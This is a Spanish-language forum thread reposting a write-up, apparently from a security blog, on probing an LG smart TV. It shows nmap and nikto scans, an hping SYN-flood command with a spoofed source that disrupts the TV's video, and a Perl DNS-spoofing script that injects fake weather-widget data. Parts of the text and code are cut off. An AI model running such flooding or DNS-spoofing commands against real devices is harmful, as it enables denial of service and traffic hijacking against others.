|
Discusiones Generales Zona para opinar sobre cualquier tema, espacio de libre expresión y entretenimiento. |
Hola Invitado! Tómate un minuto para registrarte, es 100% GRATIS y no verás ninguna publicidad! ¿Qué estás esperando? Para Ingresa a Denunciando.com por medio de TapaTalk Clic ACA | Registrarse Ahora |
Discusiones Generales » Si es berraco hagalo pues..! Hackeando los televisores LGParticipa en el tema Si es berraco hagalo pues..! Hackeando los televisores LG en el foro Discusiones Generales. |
Temas Similares | ||||
Tema | Autor | Foro | Respuestas | Último mensaje |
Hackeando pantallas de Samsung para aumentar sus prestaciones | MiL0 | Noticias Tecnologicas | 1 | 20-04-2010 21:26:05 |
Necesito ayuda, estan hackeando mis correos | ARESMETAL84 | Problemas Tecnicos | 3 | 04-01-2010 20:09:24 |
Hackeando hotmail | EPHYNION | Locales Y Caseritas | 92 | 27-12-2009 13:37:06 |
Hagalo usted mismo | andrearango71 | Chistes / Cosas Charras | 12 | 22-09-2009 09:22:41 |
Hagalo sin | johandrg | Chistes / Cosas Charras | 6 | 31-01-2009 18:53:25 |
, 18:26:42 | #1 | ||||||||||||||||||||||
Si es berraco hagalo pues..! Hackeando los televisores LG
Calificación: de
5,00
Según miraba la TV en Mediamarkt, me preguntaba a mí mismo para qué valdría el conector RJ-45 que se le veía detrás, y ya me picaban los dedos por conectarla en casa a ver qué habían dejado los ingenieros de LG a disposición de todo el mundo Así, después de ver que todo funcionaba, configuré la red cableada de la TV con la IP 192.168.52.50 y con default gateway y DNS 192.168.52.254 (la máquina de casa que hace de
Así pues… siguiendo el capítulo 0 del "Manual del buen auditor" el primer sencillo nmap lanzado (nmap -v -sT -sV -A -O -p1-65535 -P0 192.168.52.50) devuelve que no hay puertos abiertos. Leyendo el manual (esta vez el de la TV), se dice que puede reproducir contenidos digitales compatibles con
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [root@Carmen ~]# nmap -v -sT -sV -A -O -p1-65535 -P0 192.168.52.50 Interesting ports on 192.168.52.50: Not shown: 65534 closed ports PORT STATE SERVICE VERSION 33255/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
SF-Port33255-TCP:V=4.20%I=7%D=2/19%Time=4D5EFE64%P=i686-redhat-linux-gnu%r SFGetRequest,F4,"HTTP/1\.1\x20500\x20Internal\x20Server\x20Error\r\nSERV SF:ER:\x20Linux/2\.6\.31-1\.0\x20UPnP/1\.0\x20DLNADOC/1\.50\x20INTEL_NMPR/ SF:2\.0\x20LGE_DLNA_SDK/1\.5\.0\r\nCONNECTION:\x20close\r\nCONTENT-LENGTH: SF:\x2060\r\nCONTENT-TYPE:\x20text/html\r\n\r\n 500\x20Internal\x20Server\x20Error)(HTTPOptions,E8,"HTTP/1\. SF:1\x20501\x20Not\x20Implemented\r\nSERVER:\x20Linux/2\.6\.31-1\.0\x20UPn SF/1\.0\x20DLNADOC/1\.50\x20INTEL_NMPR/2\.0\x20LGE_DLNA_SDK/1\.5\.0\r\nC SF:ONNECTION:\x20close\r\nCONTENT-LENGTH:\x2054\r\nCONTENT-TYPE:\x20text/h SF:tml\r\n\r\n 501\x20Not\x20Implemented MAC Address: 00:E0:91:VV:XX:ZZ (LG Electronics) No exact OS matches for host (If you know what OS is running on it, see
TCP/IP fingerprint: OSCAN(V=4.20%D=2/19%OT=33255%CT=1%CU=38930%PV=Y%DS=1%G=Y%M=00E091%TM=4D5E OS:FECD%P=i686-redhat-linux-gnu)SEQ(SP=BB%GCD=1%ISR=C4%TI=Z%II=I%TS=A)SEQ(S OS=BB%GCD=1%ISR=C5%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW5%O2=M5 B4ST11NW5%O3=M5 OS:B4NNT11NW5%O4=M5B4ST11NW5%O5=M5B4ST11NW5%O6=M5B4ST11)WIN( W1=16A0%W2=16A0 OS:%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0 %O=M5B4NNSNW5%C OS:C=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R =N)T4(R=Y%DF=Y% OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z% A=S+%F=AR%O=%RD OS:=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N) U1(R=Y%DF=N%T=4 OS:0%TOS=C0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUL=G%R UD=G)IE(R=Y%DFI OS:=N%T=40%TOSI=S%CD=S%SI=S%DLI=S) Uptime: 0.117 days (since Fri Feb 18 21:32:27 2011) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=187 (Good luck!) IPID Sequence Generation: All zeros OS and Service detection performed. Please report any incorrect results at
Nmap finished: 1 IP address (1 host up) scanned in 119.277 seconds Raw packets sent: 126 (9832B) | Rcvd: 66 (6092B) Ahora sí que tienes un puerto abierto TCP??? ¿Qué correrá en él?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 [root@Carmen ~]# telnet 192.168.52.50 33031 Trying 192.168.52.50... Connected to 192.168.52.50 (192.168.52.50). Escape character is '^]'. GET / HTTP/1.1 HTTP/1.1 400 Bad Request SERVER: Linux/2.6.31-1.0 UPnP/1.0 DLNADOC/1.50 INTEL_NMPR/2.0 LGE_DLNA_SDK/1.5.0 CONNECTION: close CONTENT-LENGTH: 50 CONTENT-TYPE: text/html 400 Bad Request GET / HTTP/1.0 HTTP/1.1 500 Internal Server Error SERVER: Linux/2.6.31-1.0 UPnP/1.0 DLNADOC/1.50 INTEL_NMPR/2.0 LGE_DLNA_SDK/1.5.0 CONNECTION: close CONTENT-LENGTH: 60 CONTENT-TYPE: text/html 500 Internal Server Error GET / HTTP/0.9 HTTP/1.1 500 Internal Server Error SERVER: Linux/2.6.31-1.0 UPnP/1.0 DLNADOC/1.50 INTEL_NMPR/2.0 LGE_DLNA_SDK/1.5.0 CONNECTION: close CONTENT-LENGTH: 60 CONTENT-TYPE: text/html 500 Internal Server Error ^[^] telnet> quit Connection closed. Un servidor web?! Se comporta diferente dependiendo de la versión HTTP que usemos (0.9, 1.0 ó 1.1). Por la respuesta, sólo soporta peticiones HTTP 1.1, pero no permite ni una simple petición GET. ¿Tendrá vulnerabilidades? Googleando aparecen entradas sobre las capacidades DLNA (el plugin DLNADOC/1.50 que aparece en la cabecera). He de decir también que en sucesivas pruebas, el puerto abierto detectado cambiaba, en general a 33031 TCP. Aquí referenciaré siempre 33255 para mantener la coherencia. El sentido común dice que un servidor web, si tiene alguna vulnerabilidad, la fantástica herramienta
Ejecutando perl nikto.pl -host
Mientras se ejecutaba esta herramienta, mi novia, muy aficionada a hacer zapping con el mando, llegó un momento en el que, al cambiar de canal, la TV mostraba durante unos 2 segundos la imagen, y se quedaba sin señal. He reproducido varias veces la situación y la podéis ver bajo estas líneas: Aunque se pare la ejecución de la herramienta, hasta que no se reinicia la TV, no volverá a su comportamiento normal. Es decir, ¿el funcionamiento de la TV puede verse afectado dependiendo de lo que le hagas a su interfaz de red? Por ello, quise probar si era capaz de hacer algún otro tipo de denegación de servicio basado en estresar la tarjeta de red. ¿Qué pasaría si por ejemplo utilizara las capacidades de Flooding de
Una vez lanzado a ejecución la línea "hping -p 33255 --flood -a 192.168.52.254 -S 192.168.52.50" la TV empezará a recibir una inundación de paquetes por su interfaz de red que la estresará tanto que seará incapaz de reproducir correctamente el video!! El audio se oye bien, pero el video no se decodifica como tiene que ser. Lo podéis ver en el siguiente video: En este caso, si paramos la ejecución de Hping, la TV hará su trabajo correctamente, sin perder fotogramas, sin necesidad de reinicios. Buscando otros vectores de ataque
La idea ahora es analizar el funcionamiento y personalizar aún más ese portal. Siguiendo el "manual del buen juanker" nuevamente, procedemos a analizar el tráfico de red que efectúa la TV desde que la encendemos y accedemos al menú Netcast. Para ello, utilizando la herramienta
Os cuento las conclusiones obtenidas de ese análisis:
| |||||||||||||||||||||||
Twittear Seguir a @denunciando
| |
No Calculado | #1.5 |
SponSor | Re: Si es berraco hagalo pues..! Hackeando los televisores LG |
07-03-2011 , 18:27:26 | #2 | ||||||||||
Denunciante Popular | Si es berraco hagalo pues..! Hackeando los televisores LG
-----Continuacion----- Bueno, pues ya tenemos las condiciones necesarias para el caldo de cultivo de una bonita inyección que genere un panel diferente. Es increible que la TV necesite conectarse periódicamente a
Analizando la petición web que hace a accu-weather.com y la respuesta en un XML, para llevar a cabo la inyección tendremos que disponer de un servidor web accesible por la TV y modificar la resolución DNS de accu-weather.com por la del servidor web propio. Si nuestro servidor DNS nos permite añadir entradas (no hace simplemente de relay/caché de DNS) lo haremos así. Para ello deshabilité en la máquina 192.168.52.254 el servicio DNS caché y utilicé una
En mi caso, quedó así:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [root@Carmen ~]# more /tmp/dns.pl #!/usr/bin/perl use Net:NS::Nameserver; use strict; use warnings; sub reply_handler { my (, , , ,,) = @_; my (, @ans, @auth, @add); print "Received query from to ". ->{"sockhost"}. "\n"; ->print; if ( eq "A" && eq "lgtv.accu-weather.com" ) { my (, ) = (3600, "192.168.52.17"); #SI ALGUIEN NOS PIDE RESOLUCION DE LGTV.ACCU-WEATHER.COM DEVOLVEMOS LA IP DEL WEBSERVER push @ans, Net:NS::RR->new(" "); = "NOERROR"; }elsif( eq "www.lge.com" ) { my (, ) = (3600, "93.188.132.129"); #Importante añadir la resolución de
push @ans, Net:NS::RR->new(" "); = "NOERROR"; }else{ = "NXDOMAIN"; } # mark the answer as authoritive (by setting the 'aa' flag return (, \@ans, \@auth, \@add, { aa => 1 }); } my = Net:NS::Nameserver->new( LocalPort => 53, ReplyHandler => \&reply_handler, Verbose => 1, ) || die "couldn't create nameserver object\n"; ->main_loop; Así pues en la IP 192.168.52.17 levanté un servidor web, que devolvería en /widget/lgtv/weather-data.asp el siguiente XML:
1 [root@Test ~]# more /var/www/html/widget/lgtv/weather-data.asp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 <adc_database> <units> <temp>C</temp> <dist>KM</dist> <speed>KPH</speed> <pres>kPa</pres> <prec>MM</prec></units> <local> <city>FailLand</city> <state>Spain</state> <lat>40.4</lat> <lon>-3.68</lon> <time>17:32</time> <timezone>01:00</timezone> <obsdaylight>1</obsdaylight> <isdaylight>False</isdaylight></local> <currentconditions> <url>
<observationtime>SecurityByDefault tenemos 2858 Followers en Twitter</observationtime> <temperature>21</temperature> <realfeel>20</realfeel> <humidity>30%</humidity> <weathertext>Sunny</weathertext> <weathericon>01</weathericon> <windgusts>4</windgusts> <windspeed>4</windspeed> <winddirection>SW</winddirection> <precip>0.0</precip> <uvindex index="0">Low</uvindex></currentconditions> ….. SNIP </adc_database> De esta manera, la siguiente vez que entráramos en el menú
Conclusiones
| ||||||||||
08-03-2011 , 19:19:13 | #3 |
Denunciante Bronce | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
Juemadre... como enredada la vaina :/
|
08-03-2011 , 19:51:43 | #4 |
Denunciante Ultra | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
eso esta muy enredado.
|
11-03-2011 , 17:57:27 | #5 |
Denunciante Nuevo | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
teSo!!!
|
11-03-2011 , 18:34:15 | #6 |
Recien Registrado | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
bue...
|
11-03-2011 , 18:39:25 | #7 |
Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
Este en idioma zombie man, asi como se entiende????
| |
11-03-2011 , 19:01:01 | #8 |
Denunciante Popular | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
es mas facil descifrar el juego del deportivo cali
|
12-03-2011 , 00:52:05 | #9 |
Denunciante Popular | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG
mmmm pero dependiendo del router y del operador de internet que tengas.... tepodrías conectar a iptv local incluso en hd basta solo con hacer una suplantacion |
12-03-2011 , 00:57:55 | #10 |
Denunciante Ultra | Respuesta: Si es berraco hagalo pues..! Hackeando los televisores LG Es el peor copy/paste que he visto |
Etiquetas |
berraco, hackeando, hagalo, pues, televisores |
|